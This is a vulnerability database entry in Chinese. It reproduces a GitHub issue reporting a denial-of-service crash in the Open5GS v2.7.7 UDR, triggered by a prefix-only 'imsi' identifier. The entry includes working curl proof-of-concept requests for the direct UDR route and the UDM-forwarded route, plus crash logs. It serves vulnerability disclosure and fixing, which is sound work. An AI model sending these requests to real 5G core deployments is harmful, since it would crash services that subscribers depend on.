| 标题 | Open5gs UDR v2.7.7 Denial of Service |
|---|
| 描述 | ### Open5GS Release, Revision, or Tag
v2.7.7
### Description
This merged report covers the confirmed UDR reachability variants that hit the
same crash site:
```c
supi_id = ogs_id_get_value(supi);
ogs_assert(supi_id);
```
at `../lib/dbi/subscription.c:333`.
The shared malformed identifier is the same in both cases:
```text
supi = "imsi"
```
Confirmed reachability variants:
1. Direct UDR route:
`GET /nudr-dr/v1/policy-data/ues/imsi/am-data`
and similar `provisioned-data` queries
2. UDM-to-UDR forwarding chain:
`GET /nudm-sdm/v2/imsi/am-data` is forwarded into UDR and reaches the same
DB helper
### Root cause
- Shared crash site:
`../lib/dbi/subscription.c:333`
- Root cause family:
assertion after weak identifier validation
- Direct route:
`GET /nudr-dr/v1/...`
- Forwarded route:
`GET /nudm-sdm/v2/imsi/am-data` -> UDM -> UDR
- Controlling field:
prefix-only `supi=imsi`
### Direct Reproduction
```bash
UDR_IP=$(docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' udr)
curl --http2-prior-knowledge -v \
"http://$UDR_IP/nudr-dr/v1/policy-data/ues/imsi/am-data"
```
Observed in the confirmed run:
```text
curl: (56) Recv failure: Connection reset by peer
04/13 16:53:11.292: [dbi] FATAL: ogs_dbi_subscription_data: Assertion `supi_id' failed. (../lib/dbi/subscription.c:333)
running 2026-04-13T16:53:11.548360126Z 1 2026-04-13T16:53:11.530524645Z
```
### Forwarded Reproduction
Send the malformed request to UDM instead:
```bash
UDM_IP=$(docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' udm)
curl --http2-prior-knowledge -v \
"http://$UDM_IP/nudm-sdm/v2/imsi/am-data"
```
Observed in the confirmed run:
```text
curl: (28) Operation timed out after 8000 milliseconds with 0 bytes received
04/13 16:53:23.425: [dbi] FATAL: ogs_dbi_subscription_data: Assertion `supi_id' failed. (../lib/dbi/subscription.c:333)
running 2026-04-13T16:53:23.673768749Z 1 2026-04-13T16:53:23.659493442Z
```
### Logs
```text
Open5GS daemon v2.7.7
04/13 16:53:21.456: [app] INFO: Configuration: '/etc/open5gs/custom/udr.yaml' (../lib/app/ogs-init.c:144)
04/13 16:53:21.456: [app] INFO: File Logging: 'var/log/open5gs/udr.log' (../lib/app/ogs-init.c:147)
04/13 16:53:21.460: [sbi] INFO: Setup NF EndPoint(fqdn) [nrf.open5gs.org:80] (../lib/sbi/context.c:451)
04/13 16:53:21.461: [dbi] INFO: MongoDB URI: 'mongodb://db.open5gs.org/open5gs' (../lib/dbi/ogs-mongoc.c:130)
04/13 16:53:21.461: [sbi] INFO: NF Service [nudr-dr] (../lib/sbi/context.c:1985)
04/13 16:53:21.464: [sbi] INFO: nghttp2_server() [http://udr.open5gs.org]:80 (../lib/sbi/nghttp2-server.c:434)
04/13 16:53:21.464: [app] INFO: UDR initialize...done (../src/udr/app.c:31)
04/13 16:53:21.467: [sbi] INFO: [476492de-3759-41f1-b2f7-bbca80372ea7] NF registered [Heartbeat:10s] (../lib/sbi/nf-sm.c:341)
04/13 16:53:21.468: [sbi] INFO: Setup NF EndPoint(fqdn) [nrf.open5gs.org:80] (../lib/sbi/nnrf-handler.c:969)
04/13 16:53:21.468: [sbi] INFO: [4766197e-3759-41f1-a1a7-9bea98579840] Subscription created until 2026-04-14T16:53:21.468703+00:00 [duration:86400000000,validity:86400.000000,patch:43200.000000] (../lib/sbi/nnrf-handler.c:888)
04/13 16:53:23.425: [core] ERROR: strsep[imsi] failed (../lib/proto/types.c:353)
04/13 16:53:23.425: [dbi] FATAL: ogs_dbi_subscription_data: Assertion `supi_id' failed. (../lib/dbi/subscription.c:333)
04/13 16:53:23.427: [core] FATAL: backtrace() returned 9 addresses (../lib/core/ogs-abort.c:37)
/usr/local/lib/libogsdbi.so.2(ogs_dbi_subscription_data+0x27c) [0x7fd6160c02c2]
open5gs-udrd(+0xa419) [0x55dd62bd1419]
open5gs-udrd(+0x61a2) [0x55dd62bcd1a2]
/usr/local/lib/libogscore.so.2(ogs_fsm_dispatch+0x119) [0x7fd616096abc]
open5gs-udrd(+0x4e0a) [0x55dd62bcbe0a]
/usr/local/lib/libogscore.so.2(+0x12b4f) [0x7fd616086b4f]
/lib/x86_64-linux-gnu/libc.so.6(+0x94ac3) [0x7fd6156c4ac3]
/lib/x86_64-linux-gnu/libc.so.6(clone+0x44) [0x7fd615755a84]
Open5GS daemon v2.7.7
```
### Expected behaviour
UDR should reject prefix-only SUPIs with a normal error response, and UDM
should not be able to relay the malformed identifier into the same crash.
### Observed Behaviour
Both direct and forwarded variants hit the same `supi_id` assertion and crash
UDR.
### eNodeB/gNodeB
Not required.
### UE Models and versions
Not required.
|
|---|
| 来源 | ⚠️ https://github.com/open5gs/open5gs/issues/4412 |
|---|
| 用户 | FrankyLin (UID 94345) |
|---|
| 提交 | 2026-04-15 16時29分 (2 月前) |
|---|
| 管理 | 2026-05-03 09時22分 (18 days later) |
|---|
| 状态 | 已接受 |
|---|
| VulDB条目 | 360884 [Open5GS 直到 2.7.7 UDR /lib/dbi/subscription.c ogs_dbi_subscription_data supi_id 拒绝服务] |
|---|
| 积分 | 20 |
|---|